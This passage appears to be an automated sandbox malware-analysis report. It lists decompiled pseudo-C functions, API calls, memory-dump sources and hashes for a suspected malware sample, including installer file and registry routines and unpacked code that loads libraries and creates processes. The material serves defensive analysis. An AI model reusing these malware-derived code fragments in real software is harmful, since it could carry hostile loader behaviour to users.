					E74252B42(_t107, _a4,  *0x74255034,  *0x74255038);
					return _a4;
				}
				_push(E74252B14() + _a4);
				_t56 = E74252B1A();
				_v8 = _t56;
				_t77 = _t28;
				_push(_t68 + _t56 * _t77);
				_t70 = E74252B26();
				_t87 = E74252B22();
				_t90 = E74252B1E();
				_t61 = _t77;
				if( *((intOrPtr*)(_t90 + _t61)) == 2) {
					_push( *((intOrPtr*)(_t70 + _t61)));
				}
				_push( *((intOrPtr*)(_t87 + _t61)));
				asm("loop 0xfffffff1");
				goto L9;
			}

0x74252ba8
0x74252bb9
0x74252bc6
0x74252bda
0x74252bc8
0x74252bcd
0x74252bd2
0x74252bd2
0x74252bc6
0x74252be3
0x74252be8
0x74252bee
0x74252c32
0x74252c32
0x74252c37
0x74252c3c
0x74252c42
0x74252c44
0x74252c4a
0x74252c57
0x74252c59
0x74252c5e
0x74252c6b
0x74252c7e
0x74252c84
0x74252c8a
0x74252c8b
0x74252c91
0x74252c9d
0x74252ca3
0x74252cab
0x74252cac
0x74252caf
0x74252cba
0x74252cbc
0x74252cc8
0x74252cce
0x74252cd6
0x74252d02
0x74252d03
0x74252d05
0x74252d09
0x74252d09
0x74252d10
0x74252ce6
0x74252ce6
0x74252ce7
0x74252cf5
0x74252cfe
0x74252cfe
0x74252cd6
0x74252cba
0x74252d12
0x74252d19
0x74252d1b
0x74252d1b
0x74252d34
0x74252d42
0x74252d42
0x74252bf9
0x74252bfa
0x74252bff
0x74252c03
0x74252c08
0x74252c1c
0x74252c1d
0x74252c1e
0x74252c20
0x74252c25
0x74252c27
0x74252c27
0x74252c2a
0x74252c30
0x00000000

APIs

ReadFile.KERNELBASE(00000000), ref: 74252C57

Memory Dump Source

Source File: 00000000.00000002.1945649868.0000000074251000.00000020.00000001.01000000.00000004.sdmp, Offset: 74250000, based on PE: true

Associated: 00000000.00000002.1945555867.0000000074250000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1945760877.0000000074254000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1945856765.0000000074256000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_74250000_SecuriteInfo.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: a24d58e5e25a6713436582c520260e25883bec8dccff8cab628fe453f114b209
Instruction ID: 0ff469dcd0a5f3a2dae5c48ac1807b385b92c92753f35a10c3e3126bfa579484
Opcode Fuzzy Hash: a24d58e5e25a6713436582c520260e25883bec8dccff8cab628fe453f114b209
Instruction Fuzzy Hash: 3541A272610205DFEB119F69D988B99F778EB88310F3184E5E405C62A4D6389AF0EFB1

Uniqueness

Uniqueness Score: -1.00%

Function 032B11DD Relevance: 1.5, APIs: 1, Instructions: 45libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,51E21D21,1D7C4BB4,032A355D,00000000), ref: 032B12D3

Memory Dump Source

Source File: 00000000.00000002.1924258276.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 4009da3de11cf16f25fe3847fd2fa04792df14fbe8cedce6bcb6223eb76c3af5
Instruction ID: e51440824c1cdf577fc6ee221d594bf5d8cf1c3eb847c62c41e2815bb4cd9e30
Opcode Fuzzy Hash: 4009da3de11cf16f25fe3847fd2fa04792df14fbe8cedce6bcb6223eb76c3af5
Instruction Fuzzy Hash: 28018FB47543699FDF74EF2EDCA47D936F2AF19380F440029AD8DCA204C3319A918711

Uniqueness

Uniqueness Score: -1.00%

Function 032B40C4 Relevance: 1.5, APIs: 1, Instructions: 43processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(00000001,032B484E,-0000000173F082E5,032AF7EF,00000000,032A296A), ref: 032B41FA

Memory Dump Source

Source File: 00000000.00000002.1924258276.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: f4b55c4c6f14b3df2aed35c2d9cb0f0829689aac052523e71669b9c54ec3396d
Instruction ID: b2fd33875913f51ab767858e97f448871be95287a2dbb7792d79d0f3d93b2328
Opcode Fuzzy Hash: f4b55c4c6f14b3df2aed35c2d9cb0f0829689aac052523e71669b9c54ec3396d
Instruction Fuzzy Hash: 2C016234A34345CFDF24EE7B89D47D937B1AF99384F154626CD86CB30AD7B099818A10

Uniqueness

Uniqueness Score: -1.00%

Function 00402891 Relevance: 1.5, APIs: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E00402891(intOrPtr __edx, void* __eflags) {
				long _t8;
				long _t10;
				LONG* _t12;
				void* _t14;
				intOrPtr _t15;
				void* _t16;
				void* _t19;

				_t15 = __edx;
				_pop(ds);
				if(__eflags != 0) {
					_t8 = E00402D84(2);
					_pop(_t14);
					 *((intOrPtr*)(_t19 - 0x10)) = _t15;
					_t10 = SetFilePointer(E004065C8(_t14, _t16), _t8, _t12,  *(_t19 - 0x24)); // executed
					if( *((intOrPtr*)(_t19 - 0x2c)) >= _t12) {
						_push(_t10);
						_push( *((intOrPtr*)(_t19 - 0xc)));
						E004065AF();
					}
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}

0x00402891
0x00402891
0x00402892
0x0040289a
0x0040289f
0x004028a0
0x004028af
0x004028b8
0x004028be
0x00402ba1
0x00402ba4
0x00402ba4
0x004028b8
0x00402c2d
0x00402c39

APIs

SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 004028AF

Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC

Memory Dump Source

Source File: 00000000.00000002.1921543420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1921507308.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921611621.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921654388.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921798150.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921834427.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921872103.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921924152.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921963803.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: FilePointerwsprintf
String ID:
API String ID: 327478801-0
Opcode ID: c5c8d79c1340bb369312f6a5c9378fe315f9bf95113b40b2c793821570691f3d
Instruction ID: 25e331afd2345d3cd5f25c8269d0b77429ab830f022e4fbb565c81036e55150a
Opcode Fuzzy Hash: c5c8d79c1340bb369312f6a5c9378fe315f9bf95113b40b2c793821570691f3d
Instruction Fuzzy Hash: 16E09271904104BFDB01EBA5BE499AEB7B8EF44319B10483BF102F00D0DA794D119B2D

Uniqueness

Uniqueness Score: -1.00%

Function 004023B2 Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004023B2(int __eax, WCHAR* __ebx) {
				WCHAR* _t11;
				WCHAR* _t13;
				void* _t17;
				int _t21;

				_t11 = __ebx;
				_t5 = __eax;
				_t13 = 0;
				if(__eax != __ebx) {
					__eax = E00402DA6(__ebx);
				}
				if( *((intOrPtr*)(_t17 - 0x2c)) != _t11) {
					_t13 = E00402DA6(0x11);
				}
				if( *((intOrPtr*)(_t17 - 0x20)) != _t11) {
					_t11 = E00402DA6(0x22);
				}
				_t5 = WritePrivateProfileStringW(0, _t13, _t11, E00402DA6(0xffffffcd)); // executed
				_t21 = _t5;
				if(_t21 == 0) {
					 *((intOrPtr*)(_t17 - 4)) = 1;
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}

0x004023b2
0x004023b2
0x004023b4
0x004023b8
0x004023bb
0x004023c0
0x004023c5
0x004023ce
0x004023ce
0x004023d3
0x004023dc
0x004023dc
0x004023e9
0x004015b4
0x004015b6
0x0040292e
0x0040292e
0x00402c2d
0x00402c39

APIs

WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004023E9

Memory Dump Source

Source File: 00000000.00000002.1921543420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1921507308.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921611621.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921654388.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921798150.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921834427.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921872103.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921924152.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921963803.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: 498f41ba95d1dc934bc83887be66b3af98def7cf3aba53834c7129a1bd888199
Instruction ID: de4cb5ca612a6b97b91745c8380e1d92b079ec7b797fcdaf288f77766e75fad7
Opcode Fuzzy Hash: 498f41ba95d1dc934bc83887be66b3af98def7cf3aba53834c7129a1bd888199
Instruction Fuzzy Hash: FAE04F31900124BBDF603AB11F8DEAE205C6FC6744B18013EF911BA1C2E9FC8C4146AD

Uniqueness

Uniqueness Score: -1.00%

Function 00406503 Relevance: 1.5, APIs: 1, Instructions: 24
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406503(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
				void* _t7;
				long _t8;
				void* _t9;

				_t7 = E00406454(_a4,  &_a12);
				if(_t7 != 0) {
					_t8 = RegCreateKeyExW(_t7, _a8, 0, 0, 0, _a12, 0, _a16, 0); // executed
					return _t8;
				}
				_t9 = 6;
				return _t9;
			}

0x0040650d
0x00406516
0x0040652c
0x00000000
0x0040652c
0x0040651a
0x00000000

APIs

RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E57,00000000,?,?), ref: 0040652C

Memory Dump Source

Source File: 00000000.00000002.1921543420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1921507308.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921611621.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921654388.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921798150.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921834427.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921872103.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921924152.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921963803.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
Instruction ID: 390987c888b9fe28ccc3a202ccefe0e129b8fdbaba7b34d45eb5723cdb444700
Opcode Fuzzy Hash: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
Instruction Fuzzy Hash: C1E0ECB2010109BEEF099F90EC0ADBB372DEB04704F41492EF907E4091E6B5AE70AA34

Uniqueness

Uniqueness Score: -1.00%

Function 0040620A Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040620A(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x0040620e
0x0040621e
0x00406226
0x00000000
0x0040622d
0x00000000
0x0040622f

APIs

WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000,0040EB3E,0040CEF0,00403579,0040CEF0,0040EB3E,00414EF0,00004000,?,00000000,004033A3,00000004), ref: 0040621E

Memory Dump Source

Source File: 00000000.00000002.1921543420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1921507308.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921611621.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921654388.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921798150.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921834427.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921872103.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921924152.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921963803.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction ID: 398385dbb58ca0a44fa402a726e0ab0b2131cea3ae709c8a1b666252059dd88a
Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction Fuzzy Hash: F6E08632141129EBCF10AE548C00EEB375CFB01350F014476F955E3040D330E93087A5

Uniqueness

Uniqueness Score: -1.00%

Function 004061DB Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004061DB(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x004061df
0x004061ef
0x004061f7
0x00000000
0x004061fe
0x00000000
0x00406200

APIs

ReadFile.KERNELBASE(?,00000000,00000000,00000000,00000000,00414EF0,0040CEF0,004035F5,?,?,004034F9,00414EF0,00004000,?,00000000,004033A3), ref: 004061EF

Memory Dump Source

Source File: 00000000.00000002.1921543420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1921507308.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921611621.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921654388.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921798150.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921834427.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921872103.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921924152.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921963803.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
Instruction ID: 689b8facb1381159ac92aeccc4703b7db47ce2620db9a14c340ec3ef8a35c8b1
Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
Instruction Fuzzy Hash: C1E0863250021AABDF10AE518C04AEB375CEB01360F014477F922E2150D230E82187E8

Uniqueness

Uniqueness Score: -1.00%

Function 74252A7F Relevance: 1.5, APIs: 1, Instructions: 21
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {

				 *0x74255048 = _a4;
				if(_a8 == 1) {
					VirtualProtect(0x7425505c, 4, 0x40, 0x7425504c); // executed
					 *0x7425505c = 0xc2;
					 *0x7425504c = 0;
					 *0x74255054 = 0;
					 *0x74255068 = 0;
					 *0x74255058 = 0;
					 *0x74255050 = 0;
					 *0x74255060 = 0;
					 *0x7425505e = 0;
				}
				return 1;
			}

0x74252a88
0x74252a8d
0x74252a9d
0x74252aa5
0x74252aac
0x74252ab1
0x74252ab6
0x74252abb
0x74252ac0
0x74252ac5
0x74252aca
0x74252aca
0x74252ad2

APIs

VirtualProtect.KERNELBASE(7425505C,00000004,00000040,7425504C), ref: 74252A9D

Memory Dump Source

Source File: 00000000.00000002.1945649868.0000000074251000.00000020.00000001.01000000.00000004.sdmp, Offset: 74250000, based on PE: true

Associated: 00000000.00000002.1945555867.0000000074250000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1945760877.0000000074254000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1945856765.0000000074256000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_74250000_SecuriteInfo.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 4b3cc6c8dcb55dbf4590fd76fc41455ae1b10bb2a4a5c3cb4934f988e73ccd57
Instruction ID: fdd0a641da96944b7ab0798157f950cea5631d5cf86743e9493591e2367058ad
Opcode Fuzzy Hash: 4b3cc6c8dcb55dbf4590fd76fc41455ae1b10bb2a4a5c3cb4934f988e73ccd57
Instruction Fuzzy Hash: 3CF07FB2765280DEC350CF2E844878ABBE8E70C214B2645AAB188D6259E33459A4AB91

Uniqueness

Uniqueness Score: -1.00%

Function 004023F4 Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004023F4(short __ebx) {
				short _t7;
				WCHAR* _t8;
				WCHAR* _t17;
				void* _t21;
				void* _t24;

				_t7 =  *0x40a010; // 0xa
				 *(_t21 + 8) = _t7;
				_t8 = E00402DA6(1);
				 *(_t21 - 0x10) = E00402DA6(0x12);
				GetPrivateProfileStringW(_t8,  *(_t21 - 0x10), _t21 + 8, _t17, 0x3ff, E00402DA6(0xffffffdd)); // executed
				_t24 =  *_t17 - 0xa;
				if(_t24 == 0) {
					 *((intOrPtr*)(_t21 - 4)) = 1;
					 *_t17 = __ebx;
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}

0x004023f4
0x004023fb
0x004023fe
0x0040240e
0x00402425
0x0040242b
0x00401751
0x004028fc
0x00402903
0x00402903
0x00402c2d
0x00402c39

APIs

GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402425

Memory Dump Source

Source File: 00000000.00000002.1921543420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1921507308.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921611621.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921654388.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921798150.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921834427.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921872103.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921924152.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921963803.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: PrivateProfileString
String ID:
API String ID: 1096422788-0
Opcode ID: 7d71ac8ddd31db18f378b319f763d6172168bca54096192b0f97eaa7b6b6bd09
Instruction ID: 209997e2e20356d43fdb77e3237b303e11e03b8f2c16ee2f2baf27e4b220ec87
Opcode Fuzzy Hash: 7d71ac8ddd31db18f378b319f763d6172168bca54096192b0f97eaa7b6b6bd09
Instruction Fuzzy Hash: 05E01A30C00229FADB10AFA0CD09EAD3668BF41340F14052AF510AA0D1E7F889409789

Uniqueness

Uniqueness Score: -1.00%

Function 004064D5 Relevance: 1.5, APIs: 1, Instructions: 19
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004064D5(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
				void* _t7;
				long _t8;
				void* _t9;

				_t7 = E00406454(_a4,  &_a12);
				if(_t7 != 0) {
					_t8 = RegOpenKeyExW(_t7, _a8, 0, _a12, _a16); // executed
					return _t8;
				}
				_t9 = 6;
				return _t9;
			}

0x004064df
0x004064e6
0x004064f9
0x00000000
0x004064f9
0x004064ea
0x00000000

APIs

RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,00406563,?,00000000,?,?,Call,?), ref: 004064F9

Memory Dump Source

Source File: 00000000.00000002.1921543420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1921507308.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921611621.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921654388.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921798150.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921834427.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921872103.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921924152.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921963803.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
Instruction ID: 5036765eb4ab6e58186d81024f5778724aa2024cd81e2e1d5ca813995cf5404a
Opcode Fuzzy Hash: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
Instruction Fuzzy Hash: BAD0123210020DBBDF115F90AD01FAB375DAB08310F018426FE06A4092D775D534A728

Uniqueness

Uniqueness Score: -1.00%

Function 004015A3 Relevance: 1.5, APIs: 1, Instructions: 18
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004015A3() {
				int _t5;
				void* _t11;
				int _t14;

				_t5 = SetFileAttributesW(E00402DA6(0xfffffff0),  *(_t11 - 0x2c)); // executed
				_t14 = _t5;
				if(_t14 == 0) {
					 *((intOrPtr*)(_t11 - 4)) = 1;
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t11 - 4));
				return 0;
			}

0x004015ae
0x004015b4
0x004015b6
0x0040292e
0x0040292e
0x00402c2d
0x00402c39

APIs

SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE

Memory Dump Source

Source File: 00000000.00000002.1921543420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1921507308.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921611621.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921654388.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921798150.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921834427.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921872103.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921924152.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921963803.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: ecb26fcfbddf9edcaca94c07cf32aba9b51da7ecc0cd49f518a3cca194f28fd5
Instruction ID: 77b6755767f32433cbba579d7de441064f90f02de732d0e129c6c43bd553ff67
Opcode Fuzzy Hash: ecb26fcfbddf9edcaca94c07cf32aba9b51da7ecc0cd49f518a3cca194f28fd5
Instruction Fuzzy Hash: F6D0C772B08100DBDB11DBA8AA08B8D73A0AB00328B208537D001F21D0E6B8C8469A2E

Uniqueness

Uniqueness Score: -1.00%

Function 00404610 Relevance: 1.5, APIs: 1, Instructions: 9
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404610(int _a4) {
				struct HWND__* _t2;
				long _t3;

				_t2 =  *0x429238;
				if(_t2 != 0) {
					_t3 = SendMessageW(_t2, _a4, 0, 0); // executed
					return _t3;
				}
				return _t2;
			}

0x00404610
0x00404617
0x00404622
0x00000000
0x00404622
0x00404628

APIs

SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404622

Memory Dump Source

Source File: 00000000.00000002.1921543420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1921507308.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921611621.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921654388.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921798150.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921834427.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921872103.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921924152.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921963803.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 8557fc69485774ba4641c6a2d2b4437b1a5152abf7221d5f63999a85994ee7b6
Instruction ID: 1d0f09303225af8c469e983b8f6ba21d59f3f36861eec243a4bc5be8392dea83
Opcode Fuzzy Hash: 8557fc69485774ba4641c6a2d2b4437b1a5152abf7221d5f63999a85994ee7b6
Instruction Fuzzy Hash: 9EC09B71741700FBDE209B509F45F077794A754701F154979B741F60E0D775D410D62D

Uniqueness

Uniqueness Score: -1.00%

Function 004035F8 Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004035F8(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}

0x00403606
0x0040360c

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606

Memory Dump Source

Source File: 00000000.00000002.1921543420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1921507308.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921611621.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921654388.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921798150.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921834427.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921872103.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921924152.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
